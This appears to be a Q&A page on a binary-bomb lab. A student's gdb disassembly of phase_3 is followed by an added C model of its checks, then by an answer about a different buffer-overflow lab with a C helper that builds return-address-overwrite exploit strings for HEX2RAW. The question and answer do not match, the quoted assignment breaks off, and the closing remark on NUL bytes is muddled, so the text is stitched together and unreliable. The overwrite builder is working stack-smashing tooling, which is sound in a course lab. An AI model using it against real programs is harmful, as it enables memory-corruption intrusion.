Hey guys, I'm going crazy on this assembly code. Could you please explain to me what's happening?
Question
Hey guys, I'm going crazy on this assembly code. Could you please explain to me what's happening and give me an example of an input that doesn't go to exploit_bomb?
Assembly code in phase_3:
=> 0x08048bc2 <+0>: sub $0x2c,%esp
0x08048bc5 <+3>: lea 0x18(%esp),%eax
0x08048bc9 <+7>: mov %eax,0xc(%esp)
0x08048bcd <+11>: lea 0x1c(%esp),%eax
0x08048bd1 <+15>: mov %eax,0x8(%esp)
0x08048bd5 <+19>: movl $0x804a519,0x4(%esp)
0x08048bdd <+27>: mov 0x30(%esp),%eax
0x08048be1 <+31>: mov %eax,(%esp)
0x08048be4 <+34>: call 0x8048850 <__isoc99_sscanf@plt>
0x08048be9 <+39>: cmp $0x1,%eax
0x08048bec <+42>: jg 0x8048bf3
0x08048bee <+44>: call 0x8049245
0x08048bf3 <+49>: cmpl $0x7,0x1c(%esp)
0x08048bf8 <+54>: ja 0x8048c36
0x08048bfa <+56>: mov 0x1c(%esp),%eax
0x08048bfe <+60>: jmp *0x804a2a8(,%eax,4)
0x08048c05 <+67>: mov $0x188,%eax
0x08048c0a <+72>: jmp 0x8048c47
0x08048c0c <+74>: mov $0x88,%eax
0x08048c11 <+79>: jmp 0x8048c47
0x08048c13 <+81>: mov $0x153,%eax
0x08048c18 <+86>: jmp 0x8048c47
0x08048c1a <+88>: mov $0x6b,%eax
0x08048c1f <+93>: jmp 0x8048c47
0x08048c21 <+95>: mov $0x1c1,%eax
0x08048c26 <+100>: jmp 0x8048c47
0x08048c28 <+102>: mov $0xfe,%eax
0x08048c2d <+107>: jmp 0x8048c47
0x08048c2f <+109>: mov $0x38f,%eax
0x08048c34 <+114>: jmp 0x8048c47
0x08048c36 <+116>: call 0x8049245
0x08048c3b <+121>: mov $0x0,%eax
0x08048c40 <+126>: jmp 0x8048c47
0x08048c42 <+128>: mov $0x106,%eax
0x08048c47 <+133>: cmp 0x18(%esp),%eax
0x08048c4b <+137>: je 0x8048c52
0x08048c4d <+139>: call 0x8049245
0x08048c52 <+144>: add $0x2c,%esp
0x08048c55 <+147>: ret
Assembly code in <__isoc99_sscanf@plt>:
=> 0x8048850 <__isoc99_sscanf@plt>: jmp *0x804c058
0x8048856 <__isoc99_sscanf@plt+6>: push $0x98
0x804885b <__isoc99_sscanf@plt+11>: jmp 0x8048710
0x8048860 : jmp *0x804c05c
0x8048866 : push $0xa0
0x804886b : jmp 0x8048710
0x8048870 <__errno_location@plt>: jmp *0x804c060
0x8048876 <__errno_location@plt+6>: push $0xa8
--------------------------------------------------------------------------------
Breakpoint 3, 0x08048850 in __isoc99_sscanf@plt ()
gdb$ disas
Dump of assembler code for function __isoc99_sscanf@plt:
=> 0x08048850 <+0>: jmp *0x804c058
0x08048856 <+6>: push $0x98
0x0804885b <+11>: jmp 0x8048710
End of assembler dump.
Hope this is understandable.
Regards, mr.frustrated
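Added example, not part of the original post: a C model of the checks phase_3 makes, reconstructed step by step from the disassembly above. Two things are not in the post and are assumptions here: the format string at 0x804a519 (assumed "%d %d", since sscanf is handed 0x1c(%esp) and 0x18(%esp) and the code insists on a result greater than 1), and the eight words of the jump table at 0x804a2a8, which decide which `mov $imm,%eax` block each index lands on. The model takes those eight entries as input; dump the real ones with `x/8xw 0x804a2a8` in gdb before trusting any "index value" pair it prints.

```c
#include <stdio.h>
#include <string.h>

/* Each 'mov $imm,%eax' block in phase_3 and the value it loads
   (addresses and constants copied from the disassembly in the post). */
struct case_site { unsigned int addr; int value; };
static const struct case_site sites[] = {
    {0x08048c05, 0x188}, {0x08048c0c, 0x088}, {0x08048c13, 0x153},
    {0x08048c1a, 0x06b}, {0x08048c21, 0x1c1}, {0x08048c28, 0x0fe},
    {0x08048c2f, 0x38f}, {0x08048c42, 0x106},
};
#define NSITES (sizeof sites / sizeof sites[0])
#define JT_ENTRIES 8   /* cmpl $0x7 ; ja  => only indices 0..7 reach the table */

/* ASSUMED table contents: the post does not show the 8 words at 0x804a2a8.
   This guess lists the case blocks in address order; replace it with the
   output of:  (gdb) x/8xw 0x804a2a8  */
static const unsigned int assumed_table[JT_ENTRIES] = {
    0x08048c05, 0x08048c0c, 0x08048c13, 0x08048c1a,
    0x08048c21, 0x08048c28, 0x08048c2f, 0x08048c42,
};

/* Value %eax holds at 0x8048c47 after jumping to 'addr'; -1 if addr is not
   one of the known case blocks (e.g. it points at the explode call at 0x8048c36). */
int value_at_target(unsigned int addr) {
    for (size_t i = 0; i < NSITES; i++)
        if (sites[i].addr == addr) return sites[i].value;
    return -1;
}

enum outcome { ACCEPT, BOMB_FEW_ARGS, BOMB_BAD_INDEX, BOMB_MISMATCH };

/* Walk the same checks the assembly makes, in the same order. */
enum outcome phase_3_model(const char *line, const unsigned int table[JT_ENTRIES]) {
    int first, second;
    /* ASSUMED format "%d %d": sscanf fills 0x1c(%esp) first, then 0x18(%esp). */
    int n = sscanf(line, "%d %d", &first, &second);
    if (n <= 1)                          /* cmp $0x1,%eax ; jg   -> otherwise call 0x8049245 */
        return BOMB_FEW_ARGS;
    if ((unsigned int)first > 7)         /* cmpl $0x7,0x1c(%esp) ; ja  (unsigned: -1 explodes too) */
        return BOMB_BAD_INDEX;
    int expected = value_at_target(table[first]);   /* jmp *0x804a2a8(,%eax,4) */
    if (expected < 0 || expected != second)         /* cmp 0x18(%esp),%eax ; je */
        return BOMB_MISMATCH;            /* a table slot pointing at the explode call also ends here */
    return ACCEPT;
}

/* Print every accepted "index value" pair for the given table. */
void print_solutions(const unsigned int table[JT_ENTRIES]) {
    for (int i = 0; i < JT_ENTRIES; i++) {
        int v = value_at_target(table[i]);
        if (v >= 0) printf("%d %d\n", i, v);
    }
}

int main(void) {
    print_solutions(assumed_table);
    return 0;
}
```

Two details that bite people here: the `ja` at <+54> is an unsigned comparison, so a negative first number is treated as a huge index and explodes, and the second value is compared as a full 32-bit integer, so it has to be typed in decimal (0x188 is 392), not as the hex constant seen in the disassembly.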
Explanation / Answer
>> I guess I'm just not putting 2 and 2 together... I'm not sure how to use that information.
Well, you now know where the buffer starts :) And that information tells you how much data you need to write into the buffer to overwrite the return address.
>> How can I enter the address of smoke like this?
From the assignment:
>> Your exploit strings will typically contain byte values that do not correspond to the ASCII values for printing
>> characters. The program HEX2RAW can help you generate these raw strings. It takes as input a hex-formatted
>> string. In this format, each byte value is represented by two hex digits. For example, the string
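Added example, not from the original answer or the assignment: a C helper that turns the two facts the answer mentions (where the buffer starts, and where the saved return address sits above it) into the hex-formatted string HEX2RAW expects, plus a minimal HEX2RAW equivalent to check the bytes that come out. Every address used in the demo is hypothetical; take the buffer start from the `lea` that sets up the read and the return-slot address from `info frame` or `%ebp+4` in your own gdb session.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Build HEX2RAW-style text for a plain return-address overwrite on 32-bit
   x86: 'filler' bytes from the start of the buffer up to the saved return
   address, then 'target' in little-endian byte order.
   Returns the number of raw bytes the string encodes, 0 if the layout or
   the output buffer is unusable. */
size_t build_exploit_hex(unsigned int buf_start, unsigned int ret_slot,
                         unsigned int target, unsigned char filler,
                         char *out, size_t outsz) {
    if (ret_slot < buf_start) return 0;        /* return slot must lie above the buffer */
    size_t pad = ret_slot - buf_start;          /* bytes written before the return address */
    size_t total = pad + 4;
    if (outsz < total * 3) return 0;            /* "xx " per byte; the NUL fits in the last slot */
    char *p = out;
    for (size_t i = 0; i < pad; i++)
        p += sprintf(p, "%02x ", filler);
    for (int i = 0; i < 4; i++)                 /* little-endian: low byte of the address first */
        p += sprintf(p, "%02x%s", (target >> (8 * i)) & 0xff, i < 3 ? " " : "");
    return total;
}

static int nib(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Minimal HEX2RAW equivalent: parse "hh hh ..." (whitespace ignored) into
   raw bytes. Returns the byte count, or 0 on a bad digit, an odd number of
   digits, or an output buffer that is too small. */
size_t hex2raw(const char *hex, unsigned char *raw, size_t rawsz) {
    size_t n = 0;
    int hi = -1;
    for (; *hex; hex++) {
        if (isspace((unsigned char)*hex)) continue;
        int v = nib((unsigned char)*hex);
        if (v < 0) return 0;
        if (hi < 0) { hi = v; continue; }
        if (n >= rawsz) return 0;
        raw[n++] = (unsigned char)((hi << 4) | v);
        hi = -1;
    }
    return hi < 0 ? n : 0;
}

int main(void) {
    /* Hypothetical layout: buffer at 0xbffff5c0, saved return address 12 bytes
       above it, target function at 0x08048a4b. Not taken from the post. */
    char hex[128];
    unsigned char raw[64];
    size_t nbytes = build_exploit_hex(0xbffff5c0u, 0xbffff5ccu, 0x08048a4bu, 0x41, hex, sizeof hex);
    printf("%s\n", hex);
    printf("%zu raw bytes\n", hex2raw(hex, raw, sizeof raw));
    return nbytes ? 0 : 1;
}
```

The filler value does not matter for a plain return-address overwrite, but the byte order of the target does: on x86 the lowest byte goes first, so 0x08048a4b is written as `4b 8a 04 08`, and a NUL inside the address (here the `00` is absent, but 0x08 is the last byte) is only a problem if the program reads the string with a function that stops at NUL.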